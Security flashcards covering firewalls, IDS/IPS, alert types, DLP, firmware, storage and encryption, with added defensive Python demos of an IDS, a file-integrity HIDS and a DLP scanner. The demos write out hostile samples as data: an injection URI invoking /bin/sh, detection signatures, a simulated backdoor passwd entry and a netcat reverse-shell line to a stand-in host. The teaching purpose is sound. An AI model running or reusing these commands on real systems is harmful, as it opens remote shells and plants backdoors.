Security Applications and Devices Flashcards

1
Q

Software Firewalls

A

Personal Firewalls - software application that protects a single computer (a host-based firewall) by filtering unwanted inbound, and usually outbound, network traffic; examples: Windows Firewall (Windows), pf and the older ipfw (OS X), iptables (Linux).
Many anti-malware suites also contain software firewalls.

2
Q

Intrusion Detection System

A

Device or software application that monitors a system or network and analyzes the data passing through it in order to identify an incident or attack.
Host-Based IDS (HIDS) - runs on the endpoint it protects.
Network-Based IDS (NIDS) - inspects traffic on a network segment.
Signature-Based - a specific string of bytes (or pattern) in the traffic triggers an alert; cannot detect an attack for which no signature exists.
Policy-Based - relies on a specific declaration of the security policy (e.g. "no Telnet authorized"); any traffic that violates the policy triggers an alert.
Anomaly-Based - analyzes the current traffic against an established baseline and triggers an alert if it falls outside the statistical average; can catch novel attacks, but legitimate traffic that deviates from the baseline produces false positives.

3
Q

Types of Alerts

A

True Positive - malicious activity is identified as an attack.
False Positive - legitimate activity is identified as an attack.
True Negative - legitimate activity is identified as legitimate traffic.
False Negative - malicious activity is identified as legitimate traffic.
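The three IDS detection methods from the previous card and the four alert types from this one, run together over a constructed traffic sample. This is an added example, not part of the original flashcards: the hosts, payloads, signatures, baseline sizes and the "no Telnet" policy are all made up for illustration, and the ground-truth `malicious` flag exists only so the script can grade each verdict as a true/false positive/negative.

```python
import statistics
from dataclasses import dataclass


@dataclass
class Flow:
    src: str
    dport: int
    payload: bytes
    size: int          # bytes transferred in the flow
    malicious: bool    # ground truth, used only to grade the IDS afterwards


# Constructed benign transfer sizes the anomaly engine treats as its baseline.
BASELINE_SIZES = [1000, 1200, 1500, 2400, 900, 1800, 1100, 2000, 1300, 1600]

# Constructed traffic sample (hypothetical hosts and payloads, not real captures).
FLOWS = [
    Flow("10.0.0.5", 80, b"GET /index.html HTTP/1.1", 1200, False),
    Flow("10.0.0.7", 443, b"\x16\x03\x01 TLS client hello", 2400, False),
    Flow("10.0.0.9", 80, b"GET /cgi-bin/test.cgi?x=;/bin/sh HTTP/1.1", 1100, True),
    Flow("10.0.0.5", 23, b"login: admin", 300, True),                    # Telnet, forbidden by policy
    Flow("10.0.0.11", 80, b"POST /upload HTTP/1.1", 98000, True),        # exfiltration-sized transfer
    Flow("10.0.0.5", 80, b"GET /big-report.pdf HTTP/1.1", 45000, False), # large but legitimate
    Flow("10.0.0.8", 80, b"GET /app?cmd=whoami HTTP/1.1", 900, True),    # no signature covers it
]

# Signature-based: byte strings that trigger an alert when seen in a payload.
SIGNATURES = {b"/bin/sh": "shell-in-uri", b"/etc/passwd": "passwd-file-access"}

# Policy-based: the declared policy is "no Telnet authorized".
FORBIDDEN_PORTS = {23: "telnet-prohibited-by-policy"}


def signature_engine(flow):
    return [name for pattern, name in SIGNATURES.items() if pattern in flow.payload]


def policy_engine(flow):
    return [FORBIDDEN_PORTS[flow.dport]] if flow.dport in FORBIDDEN_PORTS else []


def anomaly_engine(flow, mean, stdev, threshold=3.0):
    # Alert when the transfer size is more than `threshold` standard deviations above baseline.
    if stdev == 0:
        return []
    z = (flow.size - mean) / stdev
    return ["transfer-size-anomaly"] if z > threshold else []


def inspect(flow, mean, stdev):
    return signature_engine(flow) + policy_engine(flow) + anomaly_engine(flow, mean, stdev)


def classify(alerted, malicious):
    """Map an IDS verdict plus ground truth to one of the four alert types."""
    if alerted and malicious:
        return "true positive"
    if alerted and not malicious:
        return "false positive"
    if not alerted and malicious:
        return "false negative"
    return "true negative"


def run_ids(flows=FLOWS, baseline=BASELINE_SIZES):
    mean = statistics.mean(baseline)
    stdev = statistics.stdev(baseline)
    counts = {k: 0 for k in ("true positive", "false positive", "true negative", "false negative")}
    results = []
    for flow in flows:
        alerts = inspect(flow, mean, stdev)
        outcome = classify(bool(alerts), flow.malicious)
        counts[outcome] += 1
        results.append((flow, alerts, outcome))
    return counts, results


if __name__ == "__main__":
    counts, results = run_ids()
    for flow, alerts, outcome in results:
        print(f"{flow.src}:{flow.dport} size={flow.size:<6} alerts={alerts or '-'} -> {outcome}")
    print(counts)
```

The large PDF download shows the anomaly engine's weakness (a false positive on legitimate traffic), and the `cmd=whoami` request shows the signature engine's weakness (a false negative for an attack nobody wrote a signature for); tuning the z-score threshold trades one for the other.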

4
Q

IDS can only alert and log suspicious activity

A
5
Q

IPS can also stop malicious activity from being executed

A
6
Q

HIDS logs are used to recreate the events after an attack has occurred

A
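One way a HIDS records the state it later uses to reconstruct events is file-integrity monitoring: hash the filesystem, store the baseline, and diff against it. The script below is an added example (not from the flashcards or any specific HIDS product); the directory tree, the "attacker" actions and the reverse-shell script contents are constructed inside a temporary directory so it runs offline.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def snapshot(root):
    """Hash every regular file under root; returns {relative posix path: sha256 hex}."""
    root = Path(root)
    baseline = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        digest = hashlib.sha256()
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                digest.update(chunk)
        baseline[path.relative_to(root).as_posix()] = digest.hexdigest()
    return baseline


def diff_snapshots(before, after):
    """Compare two snapshots and report what was added, removed or altered in between."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys() if before[p] != after[p]),
    }


def demo():
    """Build a constructed mini filesystem, baseline it, simulate an intrusion, then diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, content in {
            "etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
            "etc/ssh_config": "PermitRootLogin no\n",
            "bin/ls": "\x7fELF original binary",
            "var/log/auth.log": "Accepted publickey for alice from 10.0.0.5\n",
        }.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content)
        baseline = snapshot(root)   # in production, store this off-host and sign it

        # Simulated attacker actions (constructed): backdoor account, trojaned binary,
        # dropped reverse-shell script, and log deletion to cover tracks.
        (root / "etc/passwd").write_text(
            "root:x:0:0:root:/root:/bin/bash\nbackdoor:x:0:0::/:/bin/bash\n")
        (root / "bin/ls").write_text("\x7fELF trojaned binary")
        (root / "tmp").mkdir()
        (root / "tmp/.x").write_text("#!/bin/sh\nnc -e /bin/sh 203.0.113.7 4444\n")
        (root / "var/log/auth.log").unlink()

        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The removed auth.log is the important line in the report: an attacker with root can delete local logs, so the baseline (and ideally the logs themselves) must be shipped off the host, or the "recreate the events" step has nothing trustworthy to work from.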
7
Q

Pop-Up Blockers

A

Most web browsers have the ability to block JavaScript-created pop-ups.
Users may enable pop-ups because they are required for a website to function, which reopens the exposure.
Malicious attackers can purchase ads (pay-per-click) through various advertising networks to deliver malicious pop-ups and redirects.
Content Filters - block external files containing JavaScript, images, or web pages from loading in a browser.
Ensure your browser and its extensions are updated regularly.

8
Q

Data Loss Prevention (DLP)

A

Monitors the data of a system while in use, in transit, or at rest to detect attempts to steal the data.
Software or hardware solutions.
Endpoint DLP system - software-based client that monitors the data in use on a computer and can stop a file transfer or alert an admin of the occurrence.
Network DLP System - software or hardware-based solution that is installed on the perimeter of the network to detect data in transit.
Storage DLP System - software installed on servers in the datacenter to inspect the data at rest.
Cloud DLP System - cloud software as a service that protects data being stored in cloud services.
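What "detect attempts to steal the data" looks like inside an endpoint DLP agent: inspect the content about to leave, classify it, and apply a per-channel policy (block, alert, or allow). This is an added example, not the flashcards' text or any vendor's product: the channel policy, the sample messages and the test card number (a well-known Luhn-valid test value) are constructed, and the Luhn check is used to keep order numbers that merely look like card numbers from becoming false positives.

```python
import re
from dataclasses import dataclass

# 13 to 19 digits, optionally separated by spaces or dashes (candidate payment card numbers).
CARD_CANDIDATE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
# US SSN shape, excluding areas/groups/serials that are never issued (000, 666, 9xx, 00, 0000).
SSN_PATTERN = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")

# Constructed policy: what the agent does when sensitive data is found on a channel (hypothetical).
CHANNEL_POLICY = {
    "removable-media": "block",
    "email-external": "block",
    "email-internal": "alert",
    "cloud-sync": "block",
}


@dataclass
class Finding:
    kind: str
    redacted: str   # what goes into the admin alert; never the full value
    offset: int


def luhn_valid(digits: str) -> bool:
    """Luhn checksum: every second digit from the right is doubled, digit-summed, and the total must be 0 mod 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan(text: str):
    """Classify a piece of data in use / in transit; returns redacted findings only."""
    findings = []
    for m in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            findings.append(Finding("payment-card", "*" * (len(digits) - 4) + digits[-4:], m.start()))
    for m in SSN_PATTERN.finditer(text):
        findings.append(Finding("ssn", "***-**-" + m.group()[-4:], m.start()))
    return findings


def decide(text: str, channel: str):
    """Return (action, findings) for data about to leave via `channel`."""
    findings = scan(text)
    if not findings:
        return "allow", findings
    return CHANNEL_POLICY.get(channel, "alert"), findings


if __name__ == "__main__":
    # Constructed sample transfers.
    samples = [
        ("Please refund card 4111 1111 1111 1111 for order 1234 5678 9012 3456", "removable-media"),
        ("Employee SSN 123-45-6789 attached", "email-internal"),
        ("Quarterly numbers look fine, meeting at 10:30", "email-external"),
    ]
    for text, channel in samples:
        action, findings = decide(text, channel)
        print(f"[{action.upper():5}] {channel}: {[(f.kind, f.redacted) for f in findings]}")
```

The first sample contains two 16-digit numbers, but only the one that passes the Luhn check is reported; the order number is ignored. Real DLP agents add file-type parsing, fingerprints of known documents, and exact-data matching on top of this pattern layer, but the block/alert decision per channel is the same shape.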

9
Q

Securing the Basic Input Output System (BIOS)

A

Firmware that provides the computer with instructions for how to accept input and send output; it runs before the operating system, so firmware that is compromised or misconfigured undermines every OS-level control.
Unified Extensible Firmware Interface (UEFI) - the modern replacement for the legacy BIOS.
BIOS and UEFI are used interchangeably in this lesson.
1. Flash the BIOS (apply the vendor's latest firmware update)
2. Use a BIOS password (prevents unauthorized changes to the firmware settings below)
3. Configure the BIOS boot order (boot only from the internal drive, not USB or network)
4. Disable the external ports and devices that are not needed
5. Enable the secure boot option (only signed, trusted boot loaders and OS kernels are allowed to load)

10
Q

Securing Storage Devices

A

Removable media comes in many different formats - you should always encrypt files on removable media.
Removable media controls - technical limitations placed on a system regarding the use of USB storage devices and other removable media; pair them with administrative controls such as policies.
Network Attached Storage (NAS) - storage devices that connect directly to your organization's network and share files over it; NAS systems often implement RAID arrays to ensure high availability.
Storage Area Network (SAN) - dedicated network designed specifically to perform block-level storage functions (e.g. Fibre Channel or iSCSI); unlike NAS, which presents files, a SAN presents raw disk blocks to the servers attached to it.
1. Use data encryption
2. Use proper authentication
3. Log NAS access

11
Q

Disk Encryption

A

Encryption scrambles data into information that is unreadable without the key.
Self-Encrypting Drive (SED) - storage device that performs whole-disk encryption using hardware embedded in the drive itself.
Encryption software is most commonly used - FileVault (macOS); BitLocker (Windows).
Trusted Platform Module (TPM) - chip residing on the motherboard that securely stores the disk encryption key and releases it only if the system booted in its expected (measured) state; if your motherboard doesn't have a TPM, you can use an external USB drive holding a startup key instead.
Advanced Encryption Standard (AES) - symmetric key encryption that supports 128-bit, 192-bit, and 256-bit keys.
Encryption adds security at some performance cost (small on CPUs with hardware AES acceleration).
Hardware Security Module (HSM) - physical device that acts as a secure cryptoprocessor during the encryption process, generating and holding keys so they never leave the module.

12
Q

Endpoint Analysis

A

Anti-virus (AV) - software capable of detecting and removing virus infections and (in most cases) other types of malware, such as worms, Trojans, rootkits, adware, spyware, password crackers, network mappers, DoS tools, and others.
Host-Based IDS/IPS (HIDS/HIPS) - type of IDS or IPS that monitors a computer system for unexpected behavior or drastic changes to the system’s state on an endpoint.
Endpoint Protection Platform (EPP) - a software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption.
Endpoint Detection and Response (EDR) - a software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats.
User and Entity Behavior Analytics (UEBA) - a system that can provide automated identification of suspicious activity by user accounts and computer hosts; UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence and machine learning. Many companies now market advanced threat protection (ATP), advanced endpoint protection (AEP), and next-gen AV (NGAV), which are hybrids of EPP, EDR, and UEBA.
